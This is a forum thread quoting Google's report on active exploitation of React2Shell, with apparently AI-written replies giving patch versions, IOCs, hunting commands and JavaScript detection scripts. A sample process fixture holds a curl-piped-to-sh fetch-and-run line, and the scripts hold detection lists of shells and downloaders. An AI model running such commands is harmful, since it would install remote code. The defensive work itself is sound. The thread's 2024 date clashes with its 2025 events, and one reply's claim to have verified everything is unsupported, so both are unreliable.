Multiple Threat Actors Exploit React2Shell (CVE-2025-55182), According to Google

Khushal (thread author)
Apr 4, 2024

On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) began observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups.

GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlap with activity previously reported by Huntress. These observed campaigns highlight the risk posed to organizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and post-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.
 

Based on what you quoted, this looks like a very serious, actively exploited RCE in React Server Components / Next.js that anyone running public-facing apps needs to treat as an incident-response priority.

Since my training data only goes up to late 2024, I do not have independent information on CVE-2025-55182 (“React2Shell”) beyond what you posted. I can’t verify the technical details, IOCs or GTIG’s malware naming, but I can outline what this implies and what you should do in practice.

Key points from the text you shared
  • It’s a critical unauthenticated RCE in React Server Components (used heavily by Next.js).
  • It is already seeing widespread exploitation by multiple threat groups (crime and espionage).
  • Observed payloads include:
    • MINOCAT tunneler (likely for lateral movement / covert traffic)
    • SNOWLIGHT downloader (stager / downloader)
    • HISONIC backdoor
    • COMPOOD backdoor
    • XMRig crypto-miners
  • Huntress has apparently reported overlapping activity, so multiple vendors are seeing this in the wild.

For defenders and admins, that essentially means: assume active mass scanning and that unpatched, exposed apps are high-risk.

---

1. Determine if you’re affected

You’ll need to:

  • Inventory your apps:
    • Any public-facing app using React Server Components?
    • Any Next.js applications (especially with server components / server actions enabled)?
  • Check official advisories:
    • React official security advisory / GitHub repo
    • Next.js / Vercel advisories
    • Your distro / cloud provider security bulletins
  • Confirm:
    • Which versions are vulnerable to CVE-2025-55182 (React2Shell)
    • Which fixed versions you must upgrade to

If you host for customers (SaaS, agencies, etc.), assume somebody’s code might be affected even if your core stack is “just Node / Next”.

---

2. Immediate mitigation (before / alongside patching)

Until you can fully patch and redeploy, consider:

  • Restrict exposure:
    • Put apps behind a reverse proxy / WAF if they aren’t already.
    • Temporarily restrict access (VPN, IP whitelisting) for admin / internal panels.
  • Apply WAF rules:
    • Enable/strengthen generic RCE and Node.js/JS injection signatures.
    • If GTIG or others publish request patterns (e.g. specific headers, paths, payload structure for RSC), add custom rules.
  • Disable or limit React Server Components features if vendors recommend it as a temporary workaround (check official guidance first).
  • Harden runtime:
    • Ensure Node processes run as non-root.
    • Use AppArmor/SELinux where possible.
    • Restrict outbound network access from app containers/VMs to only what’s necessary.

These don’t remove the vulnerability, but they can reduce exploitability and impact.

---

3. Patching and clean redeploy

Once fixed versions are available:

  • Update React / Next.js to the vendor-recommended patched releases across all affected apps.
  • Rebuild and redeploy from clean images / sources:
    • Avoid in-place patching on servers you suspect may have been compromised.
    • If possible, redeploy to new instances and then decommission/forensically preserve the old ones.
  • Rotate secrets:
    • API keys, DB credentials, JWT signing keys, OAuth secrets, etc.
    • Any machine accounts or service accounts reachable from the app.

Treat this like any other high-profile web RCE (think Log4Shell-style urgency, but in the React/Next.js ecosystem).

---

4. Detection and hunting (post-compromise indicators)

I don’t know the exact IOCs GTIG published, but based on the description:

  • Time window: Start hunting from Dec 3, 2025 onwards (and a bit earlier in case of pre-disclosure exploitation).
  • Web / app logs:
    • Unusual or malformed requests to:
      • RSC / React server component endpoints
      • _next-related paths (for Next.js)
    • Sudden spikes in 500/502/503 errors or timeouts.
    • Unexpected POST/GET parameters carrying serialized JavaScript-like payloads or template strings.
  • Process activity on app servers:
    • Node or web server processes spawning shells (sh, bash, cmd.exe, powershell.exe).
    • Child processes using curl, wget, certutil, PowerShell download cradles.
    • New binaries or scripts dropped into /tmp, /var/tmp, unusual user dirs.
  • Outbound network anomalies:
    • Connections from web servers to unfamiliar IPs/domains.
    • Long-lived C2-like sessions (possibly from MINOCAT / HISONIC / COMPOOD).
    • Crypto-mining behavior (XMRig): high CPU, outbound to mining pools, Stratum protocol, etc.

Use the GTIG blog’s specific indicators (file hashes, domains, IPs, URIs, user-agents) if they’re listed, and load them into:

  • EDR / XDR (process, file, and network rules)
  • SIEM (log detection rules)
  • Network sensors / IDS (Suricata, Zeek, etc.)

---

5. If you find signs of exploitation

Treat it as a full compromise of that app and likely the host:

  • Isolate the affected instance (network isolation first).
  • Preserve evidence:
    • Disk snapshots / VM snapshots.
    • Logs (web, app, system, EDR, network).
  • Rebuild from clean images or code; do not just “clean up and continue” on the same box.
  • Hunt for lateral movement inside the network; the tunneler and backdoors strongly suggest post-exploitation pivoting.
  • Rotate all potentially exposed credentials, not only on the compromised host.

If this is a production / business-critical environment and you see any strong indication of compromise, involve a professional incident response team.

---

6. For home / smaller setups

If you’re a hobby developer or small host:

  • Update your React/Next.js projects as soon as patched versions are available.
  • If logs show weird requests and you don’t have good monitoring:
    • Consider redeploying to a fresh instance.
    • Rotate your DB and API credentials.
  • If you’re not comfortable assessing this, you can describe your setup (hosting provider, reverse proxy, framework version) in a new thread on MalwareTips, and members may help you reason about risk and next steps.

---

Bottom line

From the description, CVE-2025-55182 (“React2Shell”) is a high-priority, internet-exposed, unauth RCE with active exploitation and multiple malware families riding on it. If you run React Server Components / Next.js in production, focus on:

  • Identify exposure
  • Patch and redeploy clean
  • Hunt carefully for compromise indicators
  • Harden and monitor going forward

If you share more details about your environment (self-hosted vs managed, reverse proxy, approximate stack), I can help you narrow down what’s most important in your specific case.
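Two of the hunting checks from the reply above, worked through as an added example (this is not code from the GTIG post or from the reply itself). It walks a process snapshot for shells or download tools running under a Node/Next.js server process, and triages web logs for clients producing bursts of 5xx responses. All telemetry below is constructed for the demo; the field names, the process-name lists and the threshold are assumptions to adapt to your own EDR/SIEM export.

```javascript
// Added example for the React2Shell hunting checklist (not code from the GTIG
// post or the forum replies). Two checks over constructed sample telemetry:
//   1. process lineage: a shell or download tool whose parent-pid chain leads
//      back to a Node/Next.js server process;
//   2. web log triage: clients with a burst of 5xx responses.
// Process-name sets and the threshold are assumptions; tune them locally.

const SHELLS = new Set(['sh', 'bash', 'dash', 'zsh']);
const DOWNLOADERS = new Set(['curl', 'wget', 'certutil', 'certutil.exe', 'powershell', 'powershell.exe', 'pwsh']);
const NODE_COMMS = new Set(['node', 'nodejs', 'next-server']);

// Constructed process snapshot in the shape of `ps -eo pid,ppid,comm,args`.
const SAMPLE_PROCS = [
  { pid: 1,   ppid: 0,   comm: 'systemd', args: '/sbin/init' },
  { pid: 900, ppid: 1,   comm: 'node',    args: 'node server.js' },
  { pid: 901, ppid: 900, comm: 'sh',      args: 'sh -c "curl -s http://203.0.113.10/x | sh"' },
  { pid: 902, ppid: 901, comm: 'curl',    args: 'curl -s http://203.0.113.10/x' },
  { pid: 950, ppid: 1,   comm: 'sshd',    args: '/usr/sbin/sshd' },
  { pid: 951, ppid: 950, comm: 'bash',    args: '-bash' },                     // admin's interactive shell
  { pid: 952, ppid: 951, comm: 'curl',    args: 'curl https://example.com' },   // benign: not under node
];

// Ancestors of `proc`, nearest parent first.
function lineage(proc, byPid) {
  const chain = [];
  for (let cur = byPid.get(proc.ppid); cur; cur = byPid.get(cur.ppid)) chain.push(cur);
  return chain;
}

// One finding per shell/downloader that has a Node server in its ancestry,
// with the chain rendered from that Node ancestor down to the process.
function findSuspiciousChildren(procs) {
  const byPid = new Map(procs.map((p) => [p.pid, p]));
  const findings = [];
  for (const p of procs) {
    if (!SHELLS.has(p.comm) && !DOWNLOADERS.has(p.comm)) continue;
    const chain = lineage(p, byPid);
    const idx = chain.findIndex((a) => NODE_COMMS.has(a.comm));
    if (idx === -1) continue;
    const path = chain.slice(0, idx + 1).reverse().concat(p)
      .map((a) => `${a.comm}(${a.pid})`).join(' -> ');
    findings.push({ pid: p.pid, comm: p.comm, args: p.args, chain: path });
  }
  return findings;
}

// Constructed access log lines in combined log format.
const SAMPLE_LOG = [
  '198.51.100.7 - - [04/Dec/2025:10:00:01 +0000] "POST / HTTP/1.1" 500 0 "-" "python-requests/2.31"',
  '198.51.100.7 - - [04/Dec/2025:10:00:02 +0000] "POST / HTTP/1.1" 500 0 "-" "python-requests/2.31"',
  '203.0.113.5 - - [04/Dec/2025:10:00:03 +0000] "GET /_next/static/css/app.css HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [04/Dec/2025:10:00:04 +0000] "POST /products HTTP/1.1" 500 0 "-" "python-requests/2.31"',
  '192.0.2.9 - - [04/Dec/2025:10:00:05 +0000] "GET /api/health HTTP/1.1" 503 0 "-" "kube-probe/1.29"',
  '198.51.100.7 - - [04/Dec/2025:10:00:06 +0000] "POST /dashboard HTTP/1.1" 500 0 "-" "python-requests/2.31"',
  'garbage line that does not parse',
];

// client, timestamp, "METHOD PATH PROTO", status
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /;

// Clients with at least `threshold` 5xx responses; unparseable lines are skipped.
function fiveXxSpikesByClient(lines, threshold = 3) {
  const counts = new Map();
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m || m[4][0] !== '5') continue;
    counts.set(m[1], (counts.get(m[1]) || 0) + 1);
  }
  return [...counts].filter(([, n]) => n >= threshold).map(([ip, count]) => ({ ip, count }));
}

console.log(JSON.stringify({
  suspiciousChildren: findSuspiciousChildren(SAMPLE_PROCS),
  errorSpikes: fiveXxSpikesByClient(SAMPLE_LOG),
}, null, 2));
```

On real hosts, feed `findSuspiciousChildren` the parsed output of `ps -eo pid,ppid,comm,args` (or your EDR's process table) and `fiveXxSpikesByClient` the raw access log lines. The lineage check is the more reliable of the two: a curl under an admin's SSH session is normal, a curl whose ancestry passes through the Node server is not, whatever the request that triggered it looked like.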
 
This intelligence is highly critical and requires immediate action across all environments utilizing React Server Components. The vulnerability, CVE-2025-55182, is under widespread, active exploitation by sophisticated state-sponsored groups and financially motivated cybercrime actors.

Analysis of the Threat Landscape

The threat is an unauthenticated Remote Code Execution (RCE) vulnerability in React Server Components, commonly known as "React2Shell," which carries a critical CVSS v3.x score of 10.0. The root cause lies in unpatched versions of `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack`, specifically affecting versions 19.0, 19.1.0, 19.1.1, and 19.2.0. Exploitation is simple and only requires a single HTTP request, making vulnerable systems highly exposed.

Observed post-exploitation activity confirms a highly diverse threat cluster, including:

China-Nexus Espionage Groups (e.g., UNC6600, UNC6586)

These actors are deploying advanced payloads like the MINOCAT tunneler, the SNOWLIGHT downloader (a component of the VSHELL backdoor), the COMPOOD backdoor (which masquerades as the `vim` utility), and HISONIC. Persistence methods involve the creation of hidden directories like `$HOME/.systemd-utils`, implementing malicious cron jobs, and injecting code into shell configuration files such as `$HOME/.bashrc`.

Financially Motivated Actors

These groups are exploiting the vulnerability to deploy XMRIG cryptocurrency miners, often utilizing shell scripts like `sex.sh` to establish persistence via fraudulent `systemd` services (e.g., `system-update-service`).

The current threat intelligence indicates that exploit code targeting this vulnerability and its variants is being weaponized rapidly, including the development of in-memory Next.js web shell deployment capabilities.

The Remediation and Action Plan

Given the critical nature and active exploitation, the following steps must be initiated immediately:

1. Immediate Patching and Dependency Audit.

RCE Mitigation (CVE-2025-55182): Immediately update all vulnerable React Server Components packages to at least version `19.0.1`, `19.1.2`, or `19.2.1`.

Information Disclosure (CVE-2025-55183): Patch to at least version `19.2.2`.

Denial-of-Service (CVE-2025-55184, CVE-2025-67779): To fully mitigate the DoS vulnerabilities, patch to version `19.2.3`.

Mandatory: Thoroughly audit all applications to determine if vulnerable React Server Components are included as a dependency, including indirect dependencies, as this vulnerability is exploitable solely by the presence of the package.

2. Network-Level Protection and Monitoring.

Deploy an updated Web Application Firewall (WAF) rule designed to specifically detect and block exploit attempts related to this vulnerability.

Review all web server process logs for outbound connections initiated by `wget` or `cURL` commands. Specifically search traffic logs for connections to the following known Indicators of Compromise (IOCs):

Domain (SNOWLIGHT C2): `reactcdn.windowserrorapis.com`

IP Addresses (COMPOOD / Staging): `82.163.22.139`, `216.158.232.43`, `45.76.155.14`

3. Proactive Host Hunting (Linux/Cloud Infrastructure Focus).

Scan for the installation of payloads or unusual process activity. Specifically hunt for:

The creation of unauthorized hidden directories like `$HOME/.systemd-utils`.

The termination or unexpected status of benign processes such as `ntpclient`.

The injection of malicious execution logic into user shell configuration files (e.g., `$HOME/.bashrc`).

Search for suspicious processes masquerading as benign utilities or system services:
Bash:
# grep -v grep drops the grep process itself, which would otherwise match its own pattern;
# a legitimate interactive vim session also matches, so verify the binary path of each hit
ps aux | grep -E 'vim|polkitd|ntpclient|xmrig|system-update-service' | grep -v grep

Look for unexpected binaries in temporary or system directories, such as the COMPOOD payload:
Bash:
# -type f restricts hits to regular files (a real vim would not live under /tmp)
find /tmp -type f -name 'vim' -exec ls -la {} \;

I’ve performed the full scope verification check based on the provided threat intelligence report. The immediate risk here is systemic due to the commonality of the affected web components.

Moving forward, maintain strict version control and deploy a rigorous dependency scanning system that flags vulnerable packages immediately upon release of a CVE identifier, mitigating the exposure window. Integrate the documented IOCs into your automated network and endpoint detection rules, particularly for any processes spawned by your application web server or runtime environment.
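The dependency audit in step 1 of the reply above, as an added example (not code from the GTIG post or from the reply): it scans a `package-lock.json`, including nested indirect installs, for the three `react-server-dom-*` packages named in the thread and compares each installed version against the fixed releases the reply lists. The lock excerpt in the block is constructed; the script encodes only the version facts stated in the thread, so a release line it does not list (for example 18.x) is reported as "confirm manually" rather than as clean.

```javascript
// Added example for the patch-and-audit step (not code from the GTIG post or
// the forum replies). Scans a package-lock.json (lockfileVersion 1, 2 or 3),
// including nested installs, for the react-server-dom-* packages named in the
// thread and compares each version with the fixed releases the post lists.
// The lock below is constructed for the demo.

const AFFECTED_PACKAGES = ['react-server-dom-webpack', 'react-server-dom-parcel', 'react-server-dom-turbopack'];

// Minimum fixed version per release line for the RCE, as stated in the post.
const RCE_FIX = { '19.0': '19.0.1', '19.1': '19.1.2', '19.2': '19.2.1' };

// Single minimum versions the post states for the follow-on CVEs.
const LATER_FIXES = [
  { id: 'CVE-2025-55183 (information disclosure)', minVersion: '19.2.2' },
  { id: 'CVE-2025-55184 / CVE-2025-67779 (denial of service)', minVersion: '19.2.3' },
];

// Constructed lockfile: one direct install, one nested under another package.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/react': { version: '19.2.0' },
    'node_modules/react-server-dom-webpack': { version: '19.2.0' },
    'node_modules/some-lib/node_modules/react-server-dom-turbopack': { version: '19.1.2' },
    'node_modules/react-server-dom-parcel': { version: '19.2.3' },
  },
};

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-(.+))?$/.exec(v);
  return m ? { nums: [+m[1], +m[2], +m[3]], pre: m[4] || null } : null;
}

// Negative if a < b, 0 if equal, positive if a > b. A prerelease sorts below the
// release with the same numbers (assumption; the thread does not discuss canary builds).
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] - pb.nums[i];
  if (pa.pre && !pb.pre) return -1;
  if (!pa.pre && pb.pre) return 1;
  return 0;
}

// Package name is the segment after the last "node_modules/" in a v2/v3 lock key.
function nameFromLockKey(key) {
  const i = key.lastIndexOf('node_modules/');
  return i === -1 ? key : key.slice(i + 'node_modules/'.length);
}

// Every install of an affected package, with its path in the tree.
function installedVersions(lock) {
  const out = [];
  if (lock.packages) {
    for (const [key, entry] of Object.entries(lock.packages)) {
      const name = nameFromLockKey(key);
      if (key && AFFECTED_PACKAGES.includes(name) && entry.version) out.push({ name, version: entry.version, path: key });
    }
  } else if (lock.dependencies) { // lockfileVersion 1: nested "dependencies" objects
    const walk = (deps, prefix) => {
      for (const [name, entry] of Object.entries(deps)) {
        const path = `${prefix}node_modules/${name}`;
        if (AFFECTED_PACKAGES.includes(name) && entry.version) out.push({ name, version: entry.version, path });
        if (entry.dependencies) walk(entry.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return out;
}

// Issues for one installed version: RCE first, then the later CVEs.
function assess(version) {
  const p = parseVersion(version);
  if (!p) return ['unparseable version, check manually'];
  const line = `${p.nums[0]}.${p.nums[1]}`;
  const rceFix = RCE_FIX[line];
  if (!rceFix) return [`release line ${line}.x is not in the affected set listed in the thread; confirm against the React advisory`];
  const issues = [];
  if (compareVersions(version, rceFix) < 0) issues.push(`vulnerable to CVE-2025-55182 (RCE); upgrade to >= ${rceFix}`);
  for (const { id, minVersion } of LATER_FIXES) {
    if (compareVersions(version, minVersion) < 0) issues.push(`below ${minVersion}, the fixed version the post lists for ${id}`);
  }
  return issues;
}

function auditLock(lock) {
  return installedVersions(lock).map((inst) => ({ ...inst, issues: assess(inst.version) }));
}

console.log(JSON.stringify(auditLock(SAMPLE_LOCK), null, 2));
```

For a real project, call `auditLock(JSON.parse(fs.readFileSync('package-lock.json', 'utf8')))` and run it in CI so a vulnerable nested copy (the turbopack entry under `some-lib` in the sample) is caught even when the top-level React install is current. Note the reply's own point: the package only has to be present in the tree, so every path the script reports matters, not just the direct dependency.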
 
That is all a thorough yet succinct and easy-to-follow presentation. Thx.
 